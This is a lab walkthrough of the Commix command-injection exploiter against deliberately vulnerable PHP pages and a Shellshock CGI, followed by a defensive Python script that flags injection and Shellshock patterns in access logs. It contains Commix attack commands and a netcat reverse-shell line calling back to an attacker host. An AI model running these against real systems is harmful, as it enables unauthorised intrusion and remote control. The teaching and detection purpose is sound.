Commix – an automated tool for command injection 2023
This article is about Commix – an automated tool for command injection.
Introduction to Commix:
Commix, short for [comm]and [i]njection e[x]ploiter, is a tool for finding and exploiting command injection vulnerabilities in a given parameter. This article explains some of the main features of this tool by targeting some vulnerable applications. Its usage is well documented and easy to follow for anyone with basic command-line knowledge.
Setting up Commix
Download Commix by cloning the Git repository:
git clone [download]
I downloaded it and installed it on Kali Linux, where we will run all the demos in this article.
I found this tool very easy to use. We can enter the following command to get help.
python commix.py -h
Command injection
This section shows the usage and various options available with Commix. I wrote some scripts and took one target application from exploit-db.com to demonstrate different scenarios.
Example 1: Simple PHP command injection
Let’s begin with a simple PHP command injection vulnerability. Below is the script I hosted on my target server.
This can be accessed from the attacking machine using the following URL:
http://10.1.1.8/cmdinj/vulnerable.php?cmd=[some command]
Let’s see Commix in action:
Run the following command to get started with basic command injection.
python commix.py --url="http://10.1.1.8/cmdinj/vulnerable.php?cmd=INJECT_HERE"
Note that I replaced the value of the “cmd” parameter with “INJECT_HERE”. This marker tells Commix which parameter to test. Commix now starts testing this parameter and provides us with an interactive shell as shown below.

The shell obtained in this example is not stable enough to execute some commands. You can observe this in the output of the “id” command.
The same command works fine when tried from a browser.

There are multiple ways in Commix to get around this. I just used Commix’s --os-cmd option to get an nc reverse shell from the target machine.
Listen for incoming connections on port 4444 as shown below.

Now, type in the following command with Commix.
python commix.py --url="http://10.1.1.8/cmdinj/vulnerable.php?cmd=INJECT_HERE" --os-cmd="nc -e /bin/sh 10.1.1.9 4444"

Now, let’s look at the Netcat shell. We should be greeted with a new interactive shell where we can run the commands.

Note: If Netcat is not installed on the target machine, which is often the case, we can use other techniques such as a Python/Perl reverse shell.
Example 2: PHP File Manager 0.9.8 from www.exploit-db.com
The next example shows another feature of Commix that can be used to exploit command injection.
The vulnerable application can be downloaded from the link below.
https://www.exploit-db.com/exploits/37709/
Let us understand the application and manually find command injection vulnerabilities.
Host the downloaded application on the server and run it from the browser.

Click the “Enter” button and you should land on the following page.

The command injection vulnerability resides in the “Execute Command” functionality of this page. When we click this button, it asks for a command to enter.

Enter an operating system command as shown above and you should see the following link, which is vulnerable to command injection.

Now, let’s see how we can use the Commix tool to identify and exploit the vulnerability in the above application.
Type in the following command.
python commix.py --url="http://10.1.1.8/phpfilemanager/index.php?action=6&current_dir=/var/www/phpfilemanager/&cmd=INJECT_HERE"

The above step failed for some reason. After exploring for a while, I found that the target application sends cookies to the server after the “Enter” button is clicked.

Our injection attempt with Commix failed because cookies were not provided. Commix supports cookies as well: we can provide them using the “--cookie” option. Let us intercept the request and provide the cookies to Commix. This is shown below.

This time, our attempt was successful and we got a shell as shown below.

Example 3: Shellshock exploitation made easier
Personally, I liked the Shellshock exploitation feature of Commix. If you’re new to Shellshock, please check out the following articles I’ve written before.
/practical-shock-exploitation-part-1/
/practical-shell-exploitation-part-2/
These articles show the internals of Shellshock and how we can set up our own lab to practice exploiting it. The Commix tool makes it easy to exploit the Shellshock vulnerability. I’m using the same setup I used in the above articles to demonstrate Commix’s Shellshock feature.
Below is the target URL.
http://10.1.1.8/cgi-bin/vulnerable.sh
Run the following command with the “--shellshock” option to exploit the target.
python commix.py --url="http://10.1.1.8/cgi-bin/vulnerable.sh" --shellshock
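Seen from the target server's side, the requests in the three examples above leave traces in the web access log. The following is an added example, not part of the original article or of Commix: a small Python triage script that flags shell metacharacters in query parameters and the Shellshock function-definition prefix in request headers. The log lines are constructed samples in Apache combined format that reuse the lab URLs from this article; the payload shapes and the 10.1.1.7 client are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Shell metacharacters that let a parameter value chain or substitute commands.
META = re.compile(r"[;&|`\n]|\$\(|\$\{")
# Bash function-definition prefix that Shellshock requests carry in a header.
SHELLSHOCK = re.compile(r"\(\)\s*\{")
# Apache combined format: ip - - [ts] "METHOD target PROTO" status size "referer" "agent"
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "([^"]*)" "([^"]*)"'
)

# Constructed sample log lines (not captured traffic).
SAMPLE = [
    '10.1.1.9 - - [01/Jan/2023:10:00:00 +0000] "GET /cmdinj/vulnerable.php?cmd=ls HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '10.1.1.9 - - [01/Jan/2023:10:00:01 +0000] "GET /cmdinj/vulnerable.php?cmd=ls%3Becho%20probe HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
    '10.1.1.9 - - [01/Jan/2023:10:00:02 +0000] "GET /cgi-bin/vulnerable.sh HTTP/1.1" 200 40 "-" "() { :; }; echo probe"',
    '10.1.1.7 - - [01/Jan/2023:10:00:03 +0000] "GET /phpfilemanager/index.php?action=6&current_dir=/var/www/phpfilemanager/&cmd=ls HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return a list of (reason, detail) findings for one access-log line."""
    m = LINE.match(line)
    if not m:
        return []
    _ip, target, referer, agent = m.groups()
    findings = []
    # parse_qsl percent-decodes values, so encoded separators such as %3B are seen.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if META.search(value):
            findings.append(("shell-metachar-in-param", name))
    for header, value in (("referer", referer), ("user-agent", agent)):
        if SHELLSHOCK.search(value):
            findings.append(("shellshock-header", header))
    return findings

def scan(lines):
    """Group findings by client IP so repeated probing from one source stands out."""
    hits = {}
    for line in lines:
        found = classify(line)
        if found:
            hits.setdefault(line.split(" ", 1)[0], []).extend(found)
    return hits

if __name__ == "__main__":
    for ip, found in scan(SAMPLE).items():
        print(ip, found)
```

Requests such as cmd=ls pass clean because the endpoints in Examples 1 and 2 execute the parameter by design, so log triage of this kind complements fixing or removing the command-execution feature and does not replace it.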
